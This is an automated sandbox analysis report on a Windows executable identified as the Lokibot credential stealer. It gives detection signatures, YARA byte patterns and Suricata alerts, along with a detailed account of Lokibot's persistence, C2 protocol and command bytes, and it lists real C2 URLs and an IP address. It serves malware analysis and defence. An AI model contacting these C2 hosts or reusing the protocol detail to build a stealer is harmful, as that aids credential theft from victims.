Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EozUxz4ybi.exe

Overview

General Information

Sample name:EozUxz4ybi.exe
renamed because original name is a hash value
Original sample name:e33153e01680866631836ebb9e46efd2fbe07689c8a8655bedfc3f5dc059ea1f.exe
Analysis ID:1588384
MD5:e35101f489a8d1fd3b789335cbdde45d
SHA1:011376368c334f83f335c486c322194e73bd6382
SHA256:e33153e01680866631836ebb9e46efd2fbe07689c8a8655bedfc3f5dc059ea1f
Tags:exeuser-adrian__luca
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • EozUxz4ybi.exe (PID: 2884 cmdline: "C:\Users\user\Desktop\EozUxz4ybi.exe" MD5: E35101F489A8D1FD3B789335CBDDE45D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
EozUxz4ybi.exeJoeSecurity_LokibotYara detected LokibotJoe Security
    EozUxz4ybi.exeJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      EozUxz4ybi.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        EozUxz4ybi.exeWindows_Trojan_Lokibot_1f885282unknownunknown
        • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
        EozUxz4ybi.exeWindows_Trojan_Lokibot_0f421617unknownunknown
        • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          00000000.00000000.1442441088.0000000000401000.00000020.00000001.01000000.00000003.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
            00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 10 entries
                SourceRuleDescriptionAuthorStrings
                0.0.EozUxz4ybi.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                  0.0.EozUxz4ybi.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                    0.0.EozUxz4ybi.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      0.0.EozUxz4ybi.exe.400000.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                      • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                      0.0.EozUxz4ybi.exe.400000.0.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                      • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                      Click to see the 11 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T01:42:21.548499+010020243121A Network Trojan was detected192.168.2.84970494.156.177.4180TCP
                      2025-01-11T01:42:22.950193+010020243121A Network Trojan was detected192.168.2.84970594.156.177.4180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T01:42:20.817288+010020253811Malware Command and Control Activity Detected192.168.2.84970494.156.177.4180TCP
                      2025-01-11T01:42:22.238848+010020253811Malware Command and Control Activity Detected192.168.2.84970594.156.177.4180TCP
                      2025-01-11T01:42:23.040247+010020253811Malware Command and Control Activity Detected192.168.2.84970694.156.177.4180TCP
                      2025-01-11T01:42:23.920673+010020253811Malware Command and Control Activity Detected192.168.2.84970794.156.177.4180TCP
                      2025-01-11T01:42:25.197136+010020253811Malware Command and Control Activity Detected192.168.2.84970894.156.177.4180TCP
                      2025-01-11T01:42:26.102355+010020253811Malware Command and Control Activity Detected192.168.2.84970994.156.177.4180TCP
                      2025-01-11T01:42:26.968789+010020253811Malware Command and Control Activity Detected192.168.2.84971094.156.177.4180TCP
                      2025-01-11T01:42:28.135810+010020253811Malware Command and Control Activity Detected192.168.2.84971194.156.177.4180TCP
                      2025-01-11T01:42:29.019551+010020253811Malware Command and Control Activity Detected192.168.2.84971294.156.177.4180TCP
                      2025-01-11T01:42:29.891718+010020253811Malware Command and Control Activity Detected192.168.2.84971394.156.177.4180TCP
                      2025-01-11T01:42:31.084444+010020253811Malware Command and Control Activity Detected192.168.2.84971494.156.177.4180TCP
                      2025-01-11T01:42:31.992422+010020253811Malware Command and Control Activity Detected192.168.2.84971594.156.177.4180TCP
                      2025-01-11T01:42:32.889368+010020253811Malware Command and Control Activity Detected192.168.2.84971694.156.177.4180TCP
                      2025-01-11T01:42:34.065163+010020253811Malware Command and Control Activity Detected192.168.2.84971794.156.177.4180TCP
                      2025-01-11T01:42:34.969892+010020253811Malware Command and Control Activity Detected192.168.2.84971894.156.177.4180TCP
                      2025-01-11T01:42:35.848202+010020253811Malware Command and Control Activity Detected192.168.2.84972094.156.177.4180TCP
                      2025-01-11T01:42:36.756536+010020253811Malware Command and Control Activity Detected192.168.2.84972294.156.177.4180TCP
                      2025-01-11T01:42:37.616845+010020253811Malware Command and Control Activity Detected192.168.2.84972394.156.177.4180TCP
                      2025-01-11T01:42:38.534914+010020253811Malware Command and Control Activity Detected192.168.2.84972494.156.177.4180TCP
                      2025-01-11T01:42:39.453290+010020253811Malware Command and Control Activity Detected192.168.2.84972594.156.177.4180TCP
                      2025-01-11T01:42:40.352448+010020253811Malware Command and Control Activity Detected192.168.2.84972694.156.177.4180TCP
                      2025-01-11T01:42:41.207139+010020253811Malware Command and Control Activity Detected192.168.2.84972794.156.177.4180TCP
                      2025-01-11T01:42:42.069381+010020253811Malware Command and Control Activity Detected192.168.2.84972894.156.177.4180TCP
                      2025-01-11T01:42:42.979513+010020253811Malware Command and Control Activity Detected192.168.2.84972994.156.177.4180TCP
                      2025-01-11T01:42:44.030365+010020253811Malware Command and Control Activity Detected192.168.2.84973094.156.177.4180TCP
                      2025-01-11T01:42:44.878656+010020253811Malware Command and Control Activity Detected192.168.2.84973194.156.177.4180TCP
                      2025-01-11T01:42:45.910982+010020253811Malware Command and Control Activity Detected192.168.2.84973294.156.177.4180TCP
                      2025-01-11T01:42:46.766963+010020253811Malware Command and Control Activity Detected192.168.2.84973394.156.177.4180TCP
                      2025-01-11T01:42:47.676875+010020253811Malware Command and Control Activity Detected192.168.2.84973494.156.177.4180TCP
                      2025-01-11T01:42:48.545843+010020253811Malware Command and Control Activity Detected192.168.2.84973594.156.177.4180TCP
                      2025-01-11T01:42:49.438319+010020253811Malware Command and Control Activity Detected192.168.2.84973694.156.177.4180TCP
                      2025-01-11T01:42:50.341121+010020253811Malware Command and Control Activity Detected192.168.2.84973794.156.177.4180TCP
                      2025-01-11T01:42:51.209451+010020253811Malware Command and Control Activity Detected192.168.2.84973894.156.177.4180TCP
                      2025-01-11T01:42:52.288988+010020253811Malware Command and Control Activity Detected192.168.2.84973994.156.177.4180TCP
                      2025-01-11T01:42:53.175499+010020253811Malware Command and Control Activity Detected192.168.2.84974094.156.177.4180TCP
                      2025-01-11T01:42:54.184422+010020253811Malware Command and Control Activity Detected192.168.2.84974194.156.177.4180TCP
                      2025-01-11T01:42:55.035617+010020253811Malware Command and Control Activity Detected192.168.2.84974294.156.177.4180TCP
                      2025-01-11T01:42:55.992626+010020253811Malware Command and Control Activity Detected192.168.2.84974394.156.177.4180TCP
                      2025-01-11T01:42:56.917464+010020253811Malware Command and Control Activity Detected192.168.2.84974494.156.177.4180TCP
                      2025-01-11T01:42:57.813692+010020253811Malware Command and Control Activity Detected192.168.2.84974594.156.177.4180TCP
                      2025-01-11T01:42:58.986101+010020253811Malware Command and Control Activity Detected192.168.2.84974694.156.177.4180TCP
                      2025-01-11T01:43:00.003340+010020253811Malware Command and Control Activity Detected192.168.2.84974794.156.177.4180TCP
                      2025-01-11T01:43:00.875736+010020253811Malware Command and Control Activity Detected192.168.2.84974894.156.177.4180TCP
                      2025-01-11T01:43:01.944954+010020253811Malware Command and Control Activity Detected192.168.2.84974994.156.177.4180TCP
                      2025-01-11T01:43:02.826098+010020253811Malware Command and Control Activity Detected192.168.2.84975094.156.177.4180TCP
                      2025-01-11T01:43:03.707674+010020253811Malware Command and Control Activity Detected192.168.2.85123094.156.177.4180TCP
                      2025-01-11T01:43:04.854034+010020253811Malware Command and Control Activity Detected192.168.2.85123194.156.177.4180TCP
                      2025-01-11T01:43:05.736299+010020253811Malware Command and Control Activity Detected192.168.2.85123294.156.177.4180TCP
                      2025-01-11T01:43:06.614277+010020253811Malware Command and Control Activity Detected192.168.2.85123394.156.177.4180TCP
                      2025-01-11T01:43:07.773450+010020253811Malware Command and Control Activity Detected192.168.2.85123494.156.177.4180TCP
                      2025-01-11T01:43:08.660221+010020253811Malware Command and Control Activity Detected192.168.2.85123594.156.177.4180TCP
                      2025-01-11T01:43:09.514398+010020253811Malware Command and Control Activity Detected192.168.2.85123694.156.177.4180TCP
                      2025-01-11T01:43:10.707200+010020253811Malware Command and Control Activity Detected192.168.2.85123794.156.177.4180TCP
                      2025-01-11T01:43:11.607612+010020253811Malware Command and Control Activity Detected192.168.2.85123894.156.177.4180TCP
                      2025-01-11T01:43:12.528797+010020253811Malware Command and Control Activity Detected192.168.2.85123994.156.177.4180TCP
                      2025-01-11T01:43:13.572275+010020253811Malware Command and Control Activity Detected192.168.2.85124094.156.177.4180TCP
                      2025-01-11T01:43:14.611221+010020253811Malware Command and Control Activity Detected192.168.2.85124194.156.177.4180TCP
                      2025-01-11T01:43:15.469661+010020253811Malware Command and Control Activity Detected192.168.2.85124294.156.177.4180TCP
                      2025-01-11T01:43:16.338867+010020253811Malware Command and Control Activity Detected192.168.2.85124394.156.177.4180TCP
                      2025-01-11T01:43:17.186517+010020253811Malware Command and Control Activity Detected192.168.2.85124494.156.177.4180TCP
                      2025-01-11T01:43:18.171449+010020253811Malware Command and Control Activity Detected192.168.2.85124594.156.177.4180TCP
                      2025-01-11T01:43:19.049624+010020253811Malware Command and Control Activity Detected192.168.2.85124694.156.177.4180TCP
                      2025-01-11T01:43:19.935376+010020253811Malware Command and Control Activity Detected192.168.2.85124794.156.177.4180TCP
                      2025-01-11T01:43:20.826439+010020253811Malware Command and Control Activity Detected192.168.2.85124894.156.177.4180TCP
                      2025-01-11T01:43:21.716741+010020253811Malware Command and Control Activity Detected192.168.2.85124994.156.177.4180TCP
                      2025-01-11T01:43:22.578331+010020253811Malware Command and Control Activity Detected192.168.2.85125094.156.177.4180TCP
                      2025-01-11T01:43:23.456554+010020253811Malware Command and Control Activity Detected192.168.2.85125194.156.177.4180TCP
                      2025-01-11T01:43:24.327063+010020253811Malware Command and Control Activity Detected192.168.2.85125294.156.177.4180TCP
                      2025-01-11T01:43:25.184735+010020253811Malware Command and Control Activity Detected192.168.2.85125394.156.177.4180TCP
                      2025-01-11T01:43:26.109254+010020253811Malware Command and Control Activity Detected192.168.2.85125494.156.177.4180TCP
                      2025-01-11T01:43:26.979791+010020253811Malware Command and Control Activity Detected192.168.2.85125594.156.177.4180TCP
                      2025-01-11T01:43:27.847811+010020253811Malware Command and Control Activity Detected192.168.2.85125694.156.177.4180TCP
                      2025-01-11T01:43:28.764296+010020253811Malware Command and Control Activity Detected192.168.2.85125794.156.177.4180TCP
                      2025-01-11T01:43:29.742691+010020253811Malware Command and Control Activity Detected192.168.2.85125894.156.177.4180TCP
                      2025-01-11T01:43:30.877186+010020253811Malware Command and Control Activity Detected192.168.2.85125994.156.177.4180TCP
                      2025-01-11T01:43:31.748335+010020253811Malware Command and Control Activity Detected192.168.2.85126094.156.177.4180TCP
                      2025-01-11T01:43:32.607831+010020253811Malware Command and Control Activity Detected192.168.2.85126194.156.177.4180TCP
                      2025-01-11T01:43:33.949545+010020253811Malware Command and Control Activity Detected192.168.2.85126294.156.177.4180TCP
                      2025-01-11T01:43:34.814322+010020253811Malware Command and Control Activity Detected192.168.2.85126394.156.177.4180TCP
                      2025-01-11T01:43:35.685742+010020253811Malware Command and Control Activity Detected192.168.2.85126494.156.177.4180TCP
                      2025-01-11T01:43:36.565085+010020253811Malware Command and Control Activity Detected192.168.2.85126694.156.177.4180TCP
                      2025-01-11T01:43:37.485335+010020253811Malware Command and Control Activity Detected192.168.2.85127394.156.177.4180TCP
                      2025-01-11T01:43:38.387023+010020253811Malware Command and Control Activity Detected192.168.2.85128094.156.177.4180TCP
                      2025-01-11T01:43:39.246713+010020253811Malware Command and Control Activity Detected192.168.2.85128994.156.177.4180TCP
                      2025-01-11T01:43:40.188662+010020253811Malware Command and Control Activity Detected192.168.2.85129794.156.177.4180TCP
                      2025-01-11T01:43:41.063388+010020253811Malware Command and Control Activity Detected192.168.2.85130394.156.177.4180TCP
                      2025-01-11T01:43:42.036690+010020253811Malware Command and Control Activity Detected192.168.2.85130994.156.177.4180TCP
                      2025-01-11T01:43:42.952923+010020253811Malware Command and Control Activity Detected192.168.2.85131594.156.177.4180TCP
                      2025-01-11T01:43:43.902308+010020253811Malware Command and Control Activity Detected192.168.2.85132194.156.177.4180TCP
                      2025-01-11T01:43:44.785246+010020253811Malware Command and Control Activity Detected192.168.2.85132794.156.177.4180TCP
                      2025-01-11T01:43:45.736146+010020253811Malware Command and Control Activity Detected192.168.2.85133394.156.177.4180TCP
                      2025-01-11T01:43:46.597242+010020253811Malware Command and Control Activity Detected192.168.2.85133994.156.177.4180TCP
                      2025-01-11T01:43:47.457823+010020253811Malware Command and Control Activity Detected192.168.2.85134694.156.177.4180TCP
                      2025-01-11T01:43:48.358447+010020253811Malware Command and Control Activity Detected192.168.2.85135394.156.177.4180TCP
                      2025-01-11T01:43:49.238277+010020253811Malware Command and Control Activity Detected192.168.2.85136094.156.177.4180TCP
                      2025-01-11T01:43:50.112871+010020253811Malware Command and Control Activity Detected192.168.2.85136894.156.177.4180TCP
                      2025-01-11T01:43:50.991939+010020253811Malware Command and Control Activity Detected192.168.2.85137494.156.177.4180TCP
                      2025-01-11T01:43:51.872833+010020253811Malware Command and Control Activity Detected192.168.2.85138094.156.177.4180TCP
                      2025-01-11T01:43:53.011219+010020253811Malware Command and Control Activity Detected192.168.2.85138894.156.177.4180TCP
                      2025-01-11T01:43:53.904054+010020253811Malware Command and Control Activity Detected192.168.2.85139594.156.177.4180TCP
                      2025-01-11T01:43:54.763804+010020253811Malware Command and Control Activity Detected192.168.2.85140394.156.177.4180TCP
                      2025-01-11T01:43:55.926731+010020253811Malware Command and Control Activity Detected192.168.2.85140694.156.177.4180TCP
                      2025-01-11T01:43:56.799040+010020253811Malware Command and Control Activity Detected192.168.2.85141594.156.177.4180TCP
                      2025-01-11T01:43:57.706794+010020253811Malware Command and Control Activity Detected192.168.2.85142194.156.177.4180TCP
                      2025-01-11T01:43:58.606872+010020253811Malware Command and Control Activity Detected192.168.2.85142794.156.177.4180TCP
                      2025-01-11T01:43:59.461313+010020253811Malware Command and Control Activity Detected192.168.2.85143394.156.177.4180TCP
                      2025-01-11T01:44:00.327731+010020253811Malware Command and Control Activity Detected192.168.2.85143994.156.177.4180TCP
                      2025-01-11T01:44:01.206037+010020253811Malware Command and Control Activity Detected192.168.2.85144694.156.177.4180TCP
                      2025-01-11T01:44:02.066708+010020253811Malware Command and Control Activity Detected192.168.2.85145494.156.177.4180TCP
                      2025-01-11T01:44:03.052322+010020253811Malware Command and Control Activity Detected192.168.2.85145994.156.177.4180TCP
                      2025-01-11T01:44:03.938794+010020253811Malware Command and Control Activity Detected192.168.2.85146894.156.177.4180TCP
                      2025-01-11T01:44:04.874883+010020253811Malware Command and Control Activity Detected192.168.2.85147494.156.177.4180TCP
                      2025-01-11T01:44:05.900134+010020253811Malware Command and Control Activity Detected192.168.2.85148094.156.177.4180TCP
                      2025-01-11T01:44:06.794404+010020253811Malware Command and Control Activity Detected192.168.2.85148694.156.177.4180TCP
                      2025-01-11T01:44:07.842580+010020253811Malware Command and Control Activity Detected192.168.2.85149794.156.177.4180TCP
                      2025-01-11T01:44:08.809214+010020253811Malware Command and Control Activity Detected192.168.2.85150394.156.177.4180TCP
                      2025-01-11T01:44:09.691470+010020253811Malware Command and Control Activity Detected192.168.2.85150994.156.177.4180TCP
                      2025-01-11T01:44:10.558794+010020253811Malware Command and Control Activity Detected192.168.2.85151594.156.177.4180TCP
                      2025-01-11T01:44:11.428450+010020253811Malware Command and Control Activity Detected192.168.2.85152194.156.177.4180TCP
                      2025-01-11T01:44:12.445729+010020253811Malware Command and Control Activity Detected192.168.2.85153194.156.177.4180TCP
                      2025-01-11T01:44:13.353273+010020253811Malware Command and Control Activity Detected192.168.2.85153794.156.177.4180TCP
                      2025-01-11T01:44:14.206617+010020253811Malware Command and Control Activity Detected192.168.2.85154494.156.177.4180TCP
                      2025-01-11T01:44:15.088828+010020253811Malware Command and Control Activity Detected192.168.2.85155094.156.177.4180TCP
                      2025-01-11T01:44:16.015685+010020253811Malware Command and Control Activity Detected192.168.2.85155794.156.177.4180TCP
                      2025-01-11T01:44:16.870270+010020253811Malware Command and Control Activity Detected192.168.2.85156594.156.177.4180TCP
                      2025-01-11T01:44:17.776454+010020253811Malware Command and Control Activity Detected192.168.2.85157194.156.177.4180TCP
                      2025-01-11T01:44:18.905117+010020253811Malware Command and Control Activity Detected192.168.2.85157794.156.177.4180TCP
                      2025-01-11T01:44:19.764965+010020253811Malware Command and Control Activity Detected192.168.2.85158194.156.177.4180TCP
                      2025-01-11T01:44:20.625881+010020253811Malware Command and Control Activity Detected192.168.2.85158294.156.177.4180TCP
                      2025-01-11T01:44:21.737700+010020253811Malware Command and Control Activity Detected192.168.2.85158394.156.177.4180TCP
                      2025-01-11T01:44:22.607373+010020253811Malware Command and Control Activity Detected192.168.2.85158494.156.177.4180TCP
                      2025-01-11T01:44:23.517156+010020253811Malware Command and Control Activity Detected192.168.2.85158594.156.177.4180TCP
                      2025-01-11T01:44:24.362511+010020253811Malware Command and Control Activity Detected192.168.2.85158694.156.177.4180TCP
                      2025-01-11T01:44:25.207598+010020253811Malware Command and Control Activity Detected192.168.2.85158794.156.177.4180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T01:42:23.762234+010020243131Malware Command and Control Activity Detected192.168.2.84970694.156.177.4180TCP
                      2025-01-11T01:42:24.642872+010020243131Malware Command and Control Activity Detected192.168.2.84970794.156.177.4180TCP
                      2025-01-11T01:42:25.938002+010020243131Malware Command and Control Activity Detected192.168.2.84970894.156.177.4180TCP
                      2025-01-11T01:42:26.818252+010020243131Malware Command and Control Activity Detected192.168.2.84970994.156.177.4180TCP
                      2025-01-11T01:42:27.703027+010020243131Malware Command and Control Activity Detected192.168.2.84971094.156.177.4180TCP
                      2025-01-11T01:42:28.855418+010020243131Malware Command and Control Activity Detected192.168.2.84971194.156.177.4180TCP
                      2025-01-11T01:42:29.739177+010020243131Malware Command and Control Activity Detected192.168.2.84971294.156.177.4180TCP
                      2025-01-11T01:42:30.609312+010020243131Malware Command and Control Activity Detected192.168.2.84971394.156.177.4180TCP
                      2025-01-11T01:42:31.824610+010020243131Malware Command and Control Activity Detected192.168.2.84971494.156.177.4180TCP
                      2025-01-11T01:42:32.733349+010020243131Malware Command and Control Activity Detected192.168.2.84971594.156.177.4180TCP
                      2025-01-11T01:42:33.590744+010020243131Malware Command and Control Activity Detected192.168.2.84971694.156.177.4180TCP
                      2025-01-11T01:42:34.808586+010020243131Malware Command and Control Activity Detected192.168.2.84971794.156.177.4180TCP
                      2025-01-11T01:42:35.673992+010020243131Malware Command and Control Activity Detected192.168.2.84971894.156.177.4180TCP
                      2025-01-11T01:42:36.597333+010020243131Malware Command and Control Activity Detected192.168.2.84972094.156.177.4180TCP
                      2025-01-11T01:42:37.453451+010020243131Malware Command and Control Activity Detected192.168.2.84972294.156.177.4180TCP
                      2025-01-11T01:42:38.373443+010020243131Malware Command and Control Activity Detected192.168.2.84972394.156.177.4180TCP
                      2025-01-11T01:42:39.300522+010020243131Malware Command and Control Activity Detected192.168.2.84972494.156.177.4180TCP
                      2025-01-11T01:42:40.182347+010020243131Malware Command and Control Activity Detected192.168.2.84972594.156.177.4180TCP
                      2025-01-11T01:42:41.051405+010020243131Malware Command and Control Activity Detected192.168.2.84972694.156.177.4180TCP
                      2025-01-11T01:42:41.904144+010020243131Malware Command and Control Activity Detected192.168.2.84972794.156.177.4180TCP
                      2025-01-11T01:42:42.789215+010020243131Malware Command and Control Activity Detected192.168.2.84972894.156.177.4180TCP
                      2025-01-11T01:42:43.880204+010020243131Malware Command and Control Activity Detected192.168.2.84972994.156.177.4180TCP
                      2025-01-11T01:42:44.715443+010020243131Malware Command and Control Activity Detected192.168.2.84973094.156.177.4180TCP
                      2025-01-11T01:42:45.597583+010020243131Malware Command and Control Activity Detected192.168.2.84973194.156.177.4180TCP
                      2025-01-11T01:42:46.616967+010020243131Malware Command and Control Activity Detected192.168.2.84973294.156.177.4180TCP
                      2025-01-11T01:42:47.494263+010020243131Malware Command and Control Activity Detected192.168.2.84973394.156.177.4180TCP
                      2025-01-11T01:42:48.388017+010020243131Malware Command and Control Activity Detected192.168.2.84973494.156.177.4180TCP
                      2025-01-11T01:42:49.285558+010020243131Malware Command and Control Activity Detected192.168.2.84973594.156.177.4180TCP
                      2025-01-11T01:42:50.165740+010020243131Malware Command and Control Activity Detected192.168.2.84973694.156.177.4180TCP
                      2025-01-11T01:42:51.033454+010020243131Malware Command and Control Activity Detected192.168.2.84973794.156.177.4180TCP
                      2025-01-11T01:42:51.929916+010020243131Malware Command and Control Activity Detected192.168.2.84973894.156.177.4180TCP
                      2025-01-11T01:42:53.011005+010020243131Malware Command and Control Activity Detected192.168.2.84973994.156.177.4180TCP
                      2025-01-11T01:42:54.019699+010020243131Malware Command and Control Activity Detected192.168.2.84974094.156.177.4180TCP
                      2025-01-11T01:42:54.883072+010020243131Malware Command and Control Activity Detected192.168.2.84974194.156.177.4180TCP
                      2025-01-11T01:42:55.733113+010020243131Malware Command and Control Activity Detected192.168.2.84974294.156.177.4180TCP
                      2025-01-11T01:42:56.756990+010020243131Malware Command and Control Activity Detected192.168.2.84974394.156.177.4180TCP
                      2025-01-11T01:42:57.657232+010020243131Malware Command and Control Activity Detected192.168.2.84974494.156.177.4180TCP
                      2025-01-11T01:42:58.531476+010020243131Malware Command and Control Activity Detected192.168.2.84974594.156.177.4180TCP
                      2025-01-11T01:42:59.839528+010020243131Malware Command and Control Activity Detected192.168.2.84974694.156.177.4180TCP
                      2025-01-11T01:43:00.718117+010020243131Malware Command and Control Activity Detected192.168.2.84974794.156.177.4180TCP
                      2025-01-11T01:43:01.574531+010020243131Malware Command and Control Activity Detected192.168.2.84974894.156.177.4180TCP
                      2025-01-11T01:43:02.677370+010020243131Malware Command and Control Activity Detected192.168.2.84974994.156.177.4180TCP
                      2025-01-11T01:43:03.548607+010020243131Malware Command and Control Activity Detected192.168.2.84975094.156.177.4180TCP
                      2025-01-11T01:43:04.445387+010020243131Malware Command and Control Activity Detected192.168.2.85123094.156.177.4180TCP
                      2025-01-11T01:43:05.582800+010020243131Malware Command and Control Activity Detected192.168.2.85123194.156.177.4180TCP
                      2025-01-11T01:43:06.451735+010020243131Malware Command and Control Activity Detected192.168.2.85123294.156.177.4180TCP
                      2025-01-11T01:43:07.362946+010020243131Malware Command and Control Activity Detected192.168.2.85123394.156.177.4180TCP
                      2025-01-11T01:43:08.501687+010020243131Malware Command and Control Activity Detected192.168.2.85123494.156.177.4180TCP
                      2025-01-11T01:43:09.359941+010020243131Malware Command and Control Activity Detected192.168.2.85123594.156.177.4180TCP
                      2025-01-11T01:43:10.258088+010020243131Malware Command and Control Activity Detected192.168.2.85123694.156.177.4180TCP
                      2025-01-11T01:43:11.447670+010020243131Malware Command and Control Activity Detected192.168.2.85123794.156.177.4180TCP
                      2025-01-11T01:43:12.357348+010020243131Malware Command and Control Activity Detected192.168.2.85123894.156.177.4180TCP
                      2025-01-11T01:43:13.250209+010020243131Malware Command and Control Activity Detected192.168.2.85123994.156.177.4180TCP
                      2025-01-11T01:43:14.455819+010020243131Malware Command and Control Activity Detected192.168.2.85124094.156.177.4180TCP
                      2025-01-11T01:43:15.317903+010020243131Malware Command and Control Activity Detected192.168.2.85124194.156.177.4180TCP
                      2025-01-11T01:43:16.169920+010020243131Malware Command and Control Activity Detected192.168.2.85124294.156.177.4180TCP
